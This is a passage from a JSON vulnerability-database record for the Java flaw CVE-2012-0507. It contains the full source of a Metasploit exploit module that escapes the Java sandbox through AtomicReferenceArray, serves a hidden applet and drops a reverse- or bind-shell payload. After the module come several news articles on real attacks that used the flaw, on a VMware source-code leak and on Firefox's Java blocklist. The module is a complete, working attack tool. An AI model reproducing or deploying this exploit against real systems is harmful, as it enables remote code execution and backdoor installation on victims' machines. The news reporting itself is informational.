"2012-03-30T00:00:00", "id": "SAINT:58DAD69110330F9994F6C382A9E66468", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/java_se_atomicreferencearray_unsafe", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:25", "description": "", "cvss3": {}, "published": "2012-03-30T00:00:00", "type": "packetstorm", "title": "Java AtomicReferenceArray Type Violation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2012-03-30T00:00:00", "id": "PACKETSTORM:111412", "href": "https://packetstormsecurity.com/files/111412/Java-AtomicReferenceArray-Type-Violation.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize( info = {} ) \nsuper( update_info( info, \n'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability due to the fact that \nAtomicReferenceArray uses the Unsafe class to store a reference in an \narray directly, which may violate type safety if not used properly. \nThis allows a way to escape the JRE sandbox, and load additional classes \nin order to perform malicious operations. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sinn3r', # metasploit module \n'juan vazquez', # metasploit module \n'egypt' # special assistance \n], \n'References' => \n[ \n['CVE', '2012-0507'], \n['OSVDB', '80724'], \n['BID', '52161'], \n['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], \n['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], \n['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] \n], \n'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], \n'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, \n'Targets' => \n[ \n[ 'Generic (Java Payload)', \n{ \n'Platform' => ['java'], \n'Arch' => ARCH_JAVA, \n} \n], \n[ 'Windows x86 (Native Payload)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Mac OS X PPC (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_PPC, \n} \n], \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Linux x86 (Native Payload)', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 14 2012' \n)) \nend \n \n \ndef exploit \n# load the static jar file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2012-0507.jar\" ) \nfd = File.open( path, \"rb\" ) \n@jar_data = fd.read(fd.stat.size) \nfd.close \n \nsuper \nend \n \n \ndef on_request_uri( cli, request ) \ndata = \"\" \nhost = \"\" \nport = \"\" \npeer = \"#{cli.peerhost}:#{cli.peerport}\" \n \nif not request.uri.match(/\\.jar$/i) \nif not request.uri.match(/\\/$/) \nsend_redirect( cli, get_resource() + '/', '') \nreturn \nend \n \nprint_status(\"#{peer} - Sending #{self.name}\") \n \npayload = regenerate_payload( cli ) \nif not payload \nprint_error(\"#{peer} - Failed to generate the payload.\" ) \nreturn \nend \n \nif target.name == 'Generic (Java Payload)' \nif datastore['LHOST'] \njar = payload.encoded \nhost = datastore['LHOST'] \nport = datastore['LPORT'] \nvprint_status(\"Java reverse shell to #{host}:#{port} from #{peer}\" ) \nelse \nport = datastore['LPORT'] \ndatastore['RHOST'] = cli.peerhost \nvprint_status( \"Java bind shell on #{cli.peerhost}:#{port}...\" ) \nend \nif jar \nprint_status( \"Generated jar to drop (#{jar.length} bytes).\" ) \njar = Rex::Text.to_hex( jar, prefix=\"\" ) \nelse \nprint_error(\"#{peer} - Failed to generate the executable.\" ) \nreturn \nend \nelse \n \n# NOTE: The EXE mixin automagically handles detection of arch/platform \ndata = generate_payload_exe \n \nif data \nprint_status(\"#{peer} - Generated executable to drop (#{data.length} bytes).\" ) \ndata = Rex::Text.to_hex( data, prefix=\"\" ) \nelse \nprint_error(\"#{peer} - Failed to generate the executable.\" ) \nreturn \nend \n \nend \n \nsend_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) \nreturn \nend \n \nprint_status( \"#{peer} - sending jar...\" ) \nsend_response( cli, generate_jar(), { 'Content-Type' => \"application/octet-stream\" } ) \n \nhandler( cli ) \nend \n \ndef generate_html( data, jar, host, port ) \njar_name = rand_text_alpha(rand(6)+3) + \".jar\" \n \nhtml = \"<html><head></head>\" \nhtml += \"<body>\" \nhtml += \"<applet archive=\\\"#{jar_name}\\\" code=\\\"msf.x.Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\" \nhtml += \"<param name=\\\"data\\\" value=\\\"#{data}\\\"/>\" if data \nhtml += \"<param name=\\\"jar\\\" value=\\\"#{jar}\\\"/>\" if jar \nhtml += \"<param name=\\\"lhost\\\" value=\\\"#{host}\\\"/>\" if host \nhtml += \"<param name=\\\"lport\\\" value=\\\"#{port}\\\"/>\" if port \nhtml += \"</applet></body></html>\" \nreturn html \nend \n \ndef generate_jar() \nreturn @jar_data \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/111412/java_atomicreferencearray.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:02:28", "description": "Researchers have uncovered another in an ongoing series of targeted attacks against government agencies and activists, this time an attack that compromised a pair of Nepalese government web sites with code that exploits a Java vulnerability to install a backdoor on vistors\u2019 machines. \n\nThe attackers went after two sites belonging to government agencies in Nepal, the National Information Technology Center and the Office of the Prime Minister and Council Minister, and injected malicious code that is designed to exploit the [Java CVE-2012-0507](<https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again>) vulnerability that was disclosed earlier this year. If the exploit is successful, a backdoor called Zegost is then installed on the victim\u2019s machine, according to an analysis of the attack by researchers at Websense.\n\nInterestingly, the binary installed on infected machines as part of the attack is signed by a valid certificate issued by VeriSign.\n\nThat same Java vulnerability was used in attacks earlier this year on [Amnesty International](<https://threatpost.com/amnesty-international-website-compromised-serving-gh0st-rat-051112/>) and the Institute for National Security Studies in Israel, Websense said. All three of those attacks used code that was taken from a Metasploit module for the Java flaw and researchers said that the backdoors used in the Nepalese and Amnesty attacks connected back to command-and-control servers on the same domain in China.\n\nThe infection sequence for this attack follows the same script used in similar operations: compromise a high-value site, inject malicious code to exploit a common vulnerability, install a backdoor and wait for the returns.\n\n\u201cThe main page was injected with a Java JAR file loader which once rendered by the Web browser is executed and attempts to exploit the CVE-2012-0507 vulnerability. The name used for the Java class name (\u201cmsf.x.Exploit.class\u201d) and the content of the file confirmed that the code was taken from the Metasploit framework. If the exploit code in the JAR file has been successfully executed, the exploit shellcode downloads and runs the executable file named \u201ctools.exe\u201d on the impacted system (MD5: 3c7b7124f84cc4d29aa067eca6110e2f),\u201d [Gianluca Giuliani of Websense](<http://community.websense.com/blogs/securitylabs/archive/2012/08/08/nepalese-government-websites-compromised-to-serve-zegost-backdoor.aspx>) said in an analysis of the attack.\n\nZegost is a known remote-administration tool that\u2019s been used in other targeted attacks, specifically in Asia. Once on an infected machine, the backdoor used in the attack on the Nepalese sites initiates an outbound connection to a C&C server hosted on a domain in China at \u201cwho.xhhow4.com\u201d. That same domain was used in the earlier attack on Amnesty International\u2019s U.K. site, Giuliani said. The traffic is sent over TCP port 53, which typically is used for DNS, but in this case is used for C&C communications using a custom protocol.\n\nZegost has the ability to log keystrokes, steal data and then send it off to the remote C&C server, the typical behavior that one would expect from a RAT.\n\n\u201cThe backdoor also uses common features like other common backdoors, such as keylogging, and supports the ability to accept and run commands remotely. As in other cases, we can see that this backdoor isn\u2019t highly complex at all, but it\u2019s certainly no less effective than other complex malware once executed on the target systems. Another interesting aspect of this backdoor file is that it\u2019s signed with a valid certificate (that appears to have been revoked) issued to **360.cn** (a Chinese ISP) by VeriSign,\u201d Giuliani said.\n\nThe last couple of years have seen a steady stream of attacks against government agencies in countries such as Nepal and Tibet, as well as targeted attacks against activists in Syria, Iran and elsewhere. A common theme has been the use of RATs that have the ability to steal data and send it to remote servers. Defending against these attacks can be difficult for individual users, especially when they\u2019re delivered through malicious code that\u2019s hidden on supposedly trusted sites.\n", "cvss3": {}, "published": "2012-08-08T20:16:56", "type": "threatpost", "title": "Nepalese Government Sites Hacked, Serving Zegost Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2013-04-17T16:31:44", "id": "THREATPOST:CC15A784882157020D893E0B44732332", "href": "https://threatpost.com/nepalese-government-sites-hacked-serving-zegost-malware-080812/76893/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:15", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065606/hardcore_charlie_0.jpg)In what looks like the IT equivalent of the [Deepwater Horizon](<http://en.wikipedia.org/wiki/Deepwater_Horizon>) oil spill disaster, purloined data and documents, including source code belonging to the U.S. software firm VMWare, continue to bubble up from the networks of a variety of compromised Chinese firms, according to \u201cHardcore Charlie,\u201d an anonymous hacker who has claimed responsibility for the hacks.\n\nIn a statement on the VMWare Web site, Ian Mulholland, Director of VMWare\u2019s Security Response Center, said the company acknowledged that a source code file for its ESX product had been leaked online. In a phone interview, Mulholland told Threatpost the company was monitoring the situation and conducting an investigation into the incident.\n\n\u201cThe fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers,\u201d [VMware said in a statement](<http://blogs.vmware.com/security/>).\n\nVMWare\u2019s ESX is a product that is used to virtualize computing environments. The leaked documents include a source code file that VMWare has shared with its industry partners and internal company e-mail messages. He said that VMWare doesn\u2019t yet know the source of the leak, nor can it rule out a breach of its own source code repository. Subsequent releases from \u201cHardcore Charlie\u201d \u2013 who claims to have downloaded some 300 Megabytes of VMWare source code \u2013 may make the provenance of the documents clearer, he said.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053024/vmwareceiec-sized.jpg)\n\nThe leaked documents include what appear to be internal VMWare communications, pasted onto CEIEC letterhead and with official looking stamps. One email exchange, dated June 5, 2003 is from Jeffrey Sheldon to an internal VMWare listserv and has the subject \u201ccode review:untruncating segments. The e-mail exchanges are likely communications that were manually added into the company\u2019s source code repository to provide context for developers, Mulholland told Threatpost\n\nThe release of source code and developer commentary is the latest in an odd string of document leaks that are tied back to attacks on CEIEC, the China Electronics Import & Export Corporation in March. That breach is linked to a compromise of Web based e-mail accounts at the e-mail hosting company Sina.com, according to the hacker known as \u201cHardcore Charlie,\u201d who communicated with Threatpost via IRC (Internet Relay Chat.) After stealing encrypted account credentials to hundreds of thousands of [Sina.com](<http://www.sina.com/>) accounts, Hardcore Charlie said he sought the help of another hacker, who uses the handle @YamaTough, to crack the cryptographic hashes used to secure the credentials. With the cracked credentials in hand, he said he and fellow hackers began looking for accounts of interest. One they stumbled upon was apparently used by a CEIEC subsidiary in India and contained the credentials for a range of VPN (Virtual Private Network) accounts that linked into CEIEC\u2019s main corporate network.\n\nIn all, the hack of Sina.com provided access to a slew of firms in the ASIAPAC region, in addition to CEIEC. Those include China North Industries Corporation (Norinco) WanBao Mining Ltd, Ivanho and PetroVietnam, he told Threatpost. In all, the hackers claim to have collected more than a Terabyte of data from the companies, with more added every day, Hardcore Charlie told Threatpost.\n\n\u201cWe are still sorting it out and still have access to the companies,\u201d he said. \n\nIts unclear how the compromised firms got access to the documents. CEIEC has been described as an import/export company with deep ties to the Chinese government and Ministry of Foreign Trade. The company now functions as a primary contractor on many overseas projects, which may give it access to a wide range of business partners, according to [published reports such as this](<http://www.atimes.com/atimes/China/ND14Ad01.htm>). Hardcore Charlie said that the company has cut off access to its main network. However, the group retains a foothold on the networks of other firms and continues to collect a dog\u2019s dinner of leaked documents, including countless shipping documents from the U.S. Military operation in Afghanistan \u2013 many of recent vintage \u2013 Microsoft Excel spreadsheets and Adobe PDFs with subjects like \u201cITVs Need To Be Recharged,\u201d \u201cWZG Gry Carrier Updated Report,\u201d and \u201cWZG I_Tracker Updates.\u201d Most of the documents are not classified and provide dry details of U.S. Military transports within Afghanistan. During an IRC chat with Threatpost, Hardcore Charlie claimed to have received one such document, forwarded from a server operated by Wanbao Mining Co. It is unclear how the document got from the U.S. Military\u2019s unclassified network (NIPR Net) to the Wanbao server.\n\nIn an e-mail statement to Threatpost on April 11, a spokesman for the U.S. Cyber Command said it is aware of the media reports about the leaks, but \u201cdoesn\u2019t discuss operational matters \u2013 perceived or otherwise\u201d as a matter of policy.\n\n[Richard Bejtlich](<https://threatpost.com/decade-long-china-led-hack-may-have-triggered-nortels-demise-021512/>), the Chief Security Officer at security firm Mandiant and author of the[ TaoSecurity blog](<http://taosecurity.blogspot.com/>), said the jumbled collection of documents don\u2019t tell a coherent story or suggest any organized data collection activity. \u201cWhen its all jumbled like that, I wonder if they\u2019re sitting on a TOR exit node and just assembling what comes out and calling it a dossier,\u201d he told Threatpost in a phone interview. The transport documents are not typical of the kind of information that is being stolen from U.S. systems by China, but Bejtlich said that their presence in the hands of Chinese companies and Hardcore Charlie is cause for concern. \u201cI would bet people are taking this seriously, but maybe not as seriously as other kinds of breaches.\u201d\n\nHe said the military, as well as the companies involved should take steps to verify that the leaked documents are authentic, and not forgeries. After that, they should investigate the source of the leaks: whether there are compromised systems at their source, or broken \u201cbusiness processes\u201d in which human error or malicious insiders are the source of the data leaks. He said that direct company-to-company spying by Chinese firms would be a new development. \u201cMost of what we see can be traced to one of 20 groups,\u201d he said.\n\nVMWare declined to say whether it had contacted law enforcement, saying only that it was leveraging all \u201cexternal and internal\u201d resources to look into the alleged leak. The company said it takes the threat seriously and would continue to provide updates on that investigation through its Security Response Center.\n\n_Editor\u2019s Note: This story was updated to correct a reference to the Twitter handle of the hacker YamaTough. The original story referred to that hacker as \u201cRama Tough.\u201d_ _4/25/2012_\n", "cvss3": {}, "published": "2012-04-24T21:33:10", "type": "threatpost", "title": "E-Mail, Source Code From VMWare Bubbles Up From Compromised Chinese Firm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-08-15T10:09:24", "id": "THREATPOST:F992B1B74265E26E8C7499D1F03622D7", "href": "https://threatpost.com/e-mail-source-code-vmware-bubbles-compromised-chinese-firm-042412/76478/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:15", "description": "The OpenSSL developers have had to re-release the fix for a serious vulnerability in the software\u2019s ASN.1 implementation that could allow an attacker to cause a denial of service or potentially run arbitrary code on a remote machine. The updated fix only applies to version 0.9.8v; all of the other previously affected versions are already protected with the existing patch.\n\nOpenSSL released the original [advisory and fix for the CVE-2012-2110](<http://www.openssl.org/news/secadv_20120419.txt>) vulnerability last week, fixing the bug in versions 0.9.8, 1.0.1a and 1.0.0i. But after releasing the fixes, Red Hat discovered that the fix for version 0.9.8 didn\u2019t completely address the vulnerability, hence the new patch.\n\n\u201cThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key,\u201d according to the description of the bug in the [National Vulnerability Database](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2110>). \n\nOpenSSL developers are encouraging users to upgrade to the patched versions as soon as they can.\n", "cvss3": {}, "published": "2012-04-24T19:17:06", "type": "threatpost", "title": "OpenSSL Releases New Fix for CVE-2012-2110 ASN1 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2013-04-17T16:32:23", "id": "THREATPOST:B5CB39945899ADD3A3D3790E21175180", "href": "https://threatpost.com/openssl-releases-new-fix-cve-2012-2110-asn1-bug-042412/76477/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:01:49", "description": "[![Dockster](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073207/mac_trojan_7.jpg)](<https://threatpost.com/dockster-mac-malware-targets-dalai-lama-website-through-flashback-vulnerability-120312/>)Mac malware targeting Tibetan supporters is being served on a website connected to the Dalai Lama. The Dockster Trojan, discovered by researchers at [F-Secure](<http://www.f-secure.com/weblog/archives/00002466.html>), exploits the same Java vulnerability as the virulent Flashback Trojan that hit more than 600,000 OS X users earlier this year.\n\nF-Secure researcher Sean Sullivan said current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. Sullivan said Dockster is \u201ca basic backdoor with file download and keylogger capabilities.\u201d\n\nSophos, meanwhile, released an analysis of the problem and found [two malicious Java applets](<http://nakedsecurity.sophos.com/2012/12/03/dockster-mac-malware-dalai-lama/>) embedded on the gyalwarinpoche [dot] com website that are serving the malware. Infected machines are susceptible to data theft.\n\nSupporters of the Tibetan Government in Exile have been targeted before by similar attacks, including an email-based campaign based in July around the time of the [Dalai Lama\u2019s birthday](<https://threatpost.com/dalai-lamas-birthday-used-bait-targeted-attacks-070512/>). The emails contained a malicious Microsoft Word attachment that exploited a vulnerability in Common Controls and dropped variants of the Midhos Trojan. In March, a [Mac backdoor that was part of the GhostNet campaign](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>) against non-governmental organizations supporting Tibet was found.\n\nDockster, meanwhile, tries to exploit a [vulnerability patched in April by Apple](<http://nakedsecurity.sophos.com/2012/04/04/apple-patches-java-hole-that-was-being-used-to-compromise-mac-users/>). According [to CVE 2012-0507](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507>), attackers can exploit the hole to bypass Java sandbox restrictions. This is the same hole trampled on by the [Flashback Trojan](<https://threatpost.com/flashback-mac-trojan-hits-more-500k-machines-040512/>).\n\nFlashback initially posed as an Adobe Flash update and infected hundreds of thousands of computers, stealing credentials and other personal information via a keylogger communicating data to a command and control server. Later variants targeted Java on OS X. Users landing on attacker-controlled sites were tricked into downloading the malware in order to view content, or it would install without user interaction. It was also capable of [disabling Apple\u2019s XProtect antimalware system](<https://threatpost.com/flashback-trojan-now-disabling-mac-xprotect-101911/>).\n\nF-Secure\u2019s Sullivan, meanwhile, said that the Dalai Lama\u2019s site is also serving a Windows-based exploit for [CVE-2012-4681](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681>), the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet that is capable of bypassing the Java SecurityManager.\n", "cvss3": {}, "published": "2012-12-03T21:00:02", "type": "threatpost", "title": "Dockster Mac Malware Targets Dalai Lama Website Through Flashback Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-4681"], "modified": "2013-04-17T16:31:09", "id": "THREATPOST:862191C4B9FAB2D3FF3980991801A529", "href": "https://threatpost.com/dockster-mac-malware-targets-dalai-lama-website-through-flashback-vulnerability-120312/77272/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "description": "While much of the world was focused yesterday on the [Gauss malware](<https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/>) saga, there was another interesting infection happening, mainly in the Netherlands, that researchers think may be related to the [Zeus](<https://threatpost.com/zeus-source-code-leaked-051011/>) and [Citadel](<https://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>) attacks, though the motivation behind the attack is somewhat of a mystery. The new malware, called Dorifel, has infected thousands of businesses in the Netherlands and Europe and researchers say that it\u2019s stealing online banking data and the crew behind it may be working on some other attack campaigns, as well.\n\nDorifel is being distributed through phishing emails with a link, which, when clicked, will take the user to a site from which a binary is downloaded. The malware then downloads a secondary component that encrypts the files on the infected machine. This is the kind of behavior that one might expect from a piece of ransomware, such as [Reveton](<https://threatpost.com/reveton-ransomware-uses-fake-fbi-message-extort-money-080912/>), but there is no demand for payment from the victim. The malware also will look for network shares and then attempt to encrypt files found on those, as well.\n\nResearchers looking at the Dorifel infections found that, aside from the odd concentration of infections in the Netherlands, there are a couple of other odd components to the attack campaign. [David Jacoby](<https://www.securelist.com/en/blog/208193776/Dorifel_is_much_bigger_than_expected_and_it_s_still_active_and_growing>), a malware researcher at Kaspersky Lab, traced the malware back to the hosting servers, and found that not only was Dorifel being hosted on there, there also were several other pieces of malware being hosted on those boxes, along with a lot of stolen financial information.\n\n\u201cThis is a very strong indication that the gang behind the Dorifel malware was also doing some other really nasty scams. We were also able to download other samples of various malware which is still being investigated by the malware analysts at Kaspersky Lab,\u201d Jacoby said.\n\nAlong with the stolen financial data, which included credit card numbers, CVVs and victims\u2019 names, the servers also contained exploits for a pair of Java vulnerabilities. One of those flaws, [CVE-2012-0507](<https://threatpost.com/volume-malware-targeting-java-cve-2012-1723-flaw-spikes-080312/>), has been used in a variety of targeted attacks and other malware campaigns. \n\nAnalysts at [Fox-IT](<http://blog.fox-it.com/2012/08/09/xdoccryptdorifel-document-encrypting-and-network-spreading-virus/>) looked at the malware and attack techniques and saw indications that the attack may be somehow related to the Zeus and Citadel malware.\n\n\u201cThe big question is of course, what is the purpose of this Trojan, one might suspect it is ransomware, but without a ransom note I guess that would be a no go. The fact that it infects shares means that it will spread to other systems that open the infected \u2018documents\u2019 on a share. Additionally HTTP based connection functionality suggests that the Trojan has additional download tasks and likely executes additional payloads on systems that have been infected. Given the Modus Operandi of this operation, it is likely that it downloads the Citadel Trojan and this entire attack was just to increase the size of the botnet through spreading of network shares. Currently however there appears to be no task defined and no additional malware is downloaded,\u201d the company said in its analysis.\n\nJacoby saw some of the same indications in his research, as well, but nothing completely definitive about the link between Dorifel and Zeus or Citadel.\n\n\u201cAs mentioned before, we did find some interesting financial information, which could be an indication that this malware scam is related to for example ZeuS/Citadel, but since we have not yet identified any malware related to ZeuS/Citadel we cannot confirm it. All we can confirm is that the same server does store stolen financial information. We are still investigating this,\u201d he said.\n\nThe large majority of the infections from Dorifel have been found in the Netherlands so far, but there also are infected machines in other European countries, including Denmark, and a handful in the United States, too.\n", "cvss3": {}, "published": "2012-08-10T14:24:54", "type": "threatpost", "title": "Dorifel Malware Encrypts Files, Steals Financial Data, May Be Related to Zeus or Citadel", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723"], "modified": "2015-04-13T17:37:40", "id": "THREATPOST:427F2EA5BAE6D1C835F7B049DD5D6D27", "href": "https://threatpost.com/dorifel-malware-encrypts-files-steals-financial-data-may-be-related-zeus-or-citadel-081012/76900/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:30", "description": "It\u2019s been nearly two months since Oracle patched the [CVE-2012-1723 Java vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723>), a serious remote pre-authentication flaw that\u2019s present in the Java Runtime Environment. It\u2019s taken a little time, but the attacker community has decided that this bug deserves some serious attention, and as a result, attacks trying to exploit it have ramped up significantly in recent weeks.\n\nThe first malware samples that were exploiting this vulnerability started appearing about a month ago, but it was just in dribs and drabs. But by the second week of July, the number of attacks on CVE-2012-1723 began to take off dramatically. Microsoft researchers compiled statistics that show the volume of malware targeting the Java flaw really took off around July 10, and, with some peaks and valleys in the interim, is still quite high now.\n\nThe vulnerability itself is in a JRE sub-component called Hotspot and attackers who are able to exploit it will have the ability to execute arbitrary code on the target machine.\n\n\u201cThe issue is in the optimization performed when a field inside the class is accessed. A static field with a _ClassLoader_ or_Object_ type and bunch of instance-fields with custom data type is a strong indication of exploitation. A bunch of instance-fields are a buffer area where a type-confused object is retrieved,\u201d [Jeong Wook Oh of the Microsoft Malware Protection Center](<https://blogs.technet.com/b/mmpc/archive/2012/08/01/the-rise-of-a-new-java-vulnerability-cve-2012-1723.aspx?Redirected=true>) said in an analysis of the attacks.\n\nAn oddity with this vulnerability is that attackers don\u2019t have the ability to disguise what they\u2019re doing with their exploits in this case. Oh said that because attackers need to build a Java class with some specific attributes, it\u2019s relatively easy for analysts to see what\u2019s going on.\n\n\u201cJava-based malware could use a Java-reflection feature to obfuscate vulnerable class and methods loading code when the vulnerability is inside specific class and methods \u2014 for example, CVE-2012-0507 was related to_AtomicReferenceArray_ class. The loading of _AtomicReferenceArray_ class itself can be obfuscated and you can\u2019t easily tell whether it is loading the specific class at all just by looking into the Java code. This makes the whole malware analysis process more time-consuming,\u201d Oh said.\n\n\u201cFor this vulnerability, attackers can\u2019t obfuscate the core exploit part easily. As we explained with Figure 3, the attackers need to create a class with specific features like static field member with _ClassLoader_ type or _Object_type. And bunch of instance fields follows. It has specific code pieces to run which looks like the code shown in Figure 4. Java doesn\u2019t provide ways to obfuscate this class structure itself, so the code pattern stands out. You can easily identify the pattern just by statically investigating the code.\u201d\n", "cvss3": {}, "published": "2012-08-03T14:30:06", "type": "threatpost", "title": "Volume of Malware Targeting Java CVE-2012-1723 Flaw Spikes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723"], "modified": "2013-04-17T16:31:45", "id": "THREATPOST:F12913D59D338ABFA8959ABE0730DC2B", "href": "https://threatpost.com/volume-malware-targeting-java-cve-2012-1723-flaw-spikes-080312/76878/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "[![Firefox Java](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065448/firefoxblockjava.jpg)](<https://threatpost.com/mozilla-adds-older-java-versions-firefox-blocklist-040312/>)Mozilla has made a change in Firefox that will block all of the older versions of Java that contain a critical vulnerability that\u2019s being actively exploited. The decision to add these vulnerable versions of Java to the browser\u2019s blocklist is designed to protect users who may not be aware of the flaw and attacks.\n\nThe specific vulnerability in Java that Mozilla is trying to protect users against was patched by Oracle in February, but Java is one of the many browser components and extensions that users sometimes will fail to update for long periods of time. If users don\u2019t have the automatic updates enabled for Java, it could be a long time before they remember to update the software and that\u2019s a dangerous habit given how much attackers love to exploit Java.\n\n\u201cThis vulnerability\u2014present in the older versions of the JDK and JRE\u2014is actively being exploited, and is a potential risk to users. To mitigate this risk, we have added affected versions of the Java plugin for Windows (Version 6 Update 30 and below as well as Version 7 Update 2 and below) to Firefox\u2019s [blocklist](<https://addons.mozilla.org/en-US/firefox/blocked/p80>). A blocklist entry for the Java plugin on OS X may be added at a future date. Mozilla strongly encourages anyone who requires the JDK and JRE to update to the current version as soon as possible on all platforms,\u201d [Mozilla\u2019s Kev Needham](<http://blog.mozilla.com/addons/2012/04/02/blocking-java/>) said.\n\nMozilla\u2019s decision to add a legitimate piece of software, albeit a highly vulnerable and oft-exploited one, to its blocklist is an unusual and bold step. Java is a ubiquitous application that\u2019s used on millions of Web pages and other apps across the Internet and while most people in the security community are aware of the dangers that it can pose, many typical users are not. As a result, Mozilla officials took the remarkable step of blacklisting all but the most recent version of Java. \n\n\u201cAffected versions of the Java plugin will be disabled unless a user makes an explicit choice to keep it enabled at the time they are notified of the block being applied,\u201d Needham said.\n\nJava has been the target of a slew of attacks in recent weeks as criminals have targeted a known unpatched vulnerability in the software, and researchers have said that there also are ongoing attacks against some older Java flaws, including CVE-2012-0507. That vulnerability now is the target of an exploit that was added to the infamous Blackhole exploit kit. \n\n\u201cMalicious Java applet stored within a Java archive (.JAR) that attempts to exploit a vulnerability in the Java Runtime Environment (JRE) up to and including versions 7 update 2, versions 6 update 30 and versions 5 update 33,\u201d [Mila Parkour](<http://contagiodump.blogspot.com/2012/03/java-cve-2012-0507-atmic-cve-2012-0506.html>) wrote in a post on the Contagio blog. \n", "cvss3": {}, "published": "2012-04-03T13:25:06", "type": "threatpost", "title": "Mozilla Adds Older Java Versions to Firefox Blocklist", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0506", "CVE-2012-0507"], "modified": "2013-04-17T16:32:31", "id": "THREATPOST:A1DDB45DCB57F828DB4CF6A503E200DF", "href": "https://threatpost.com/mozilla-adds-older-java-versions-firefox-blocklist-040312/76394/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Researchers with Microsoft have spotted a spike in Crowti, a ransomware similar to Cryptolocker that encrypts files on victims\u2019 machines and then asks for payment to unlock them.\n\nThe malware has existed for several months but it wasn\u2019t until mid-October that Microsoft\u2019s Malware Protection Center noticed its biggest swell to date. The campaign infected 4000 different systems at its peak, with the bulk of those, 71 percent, confined to machines in the 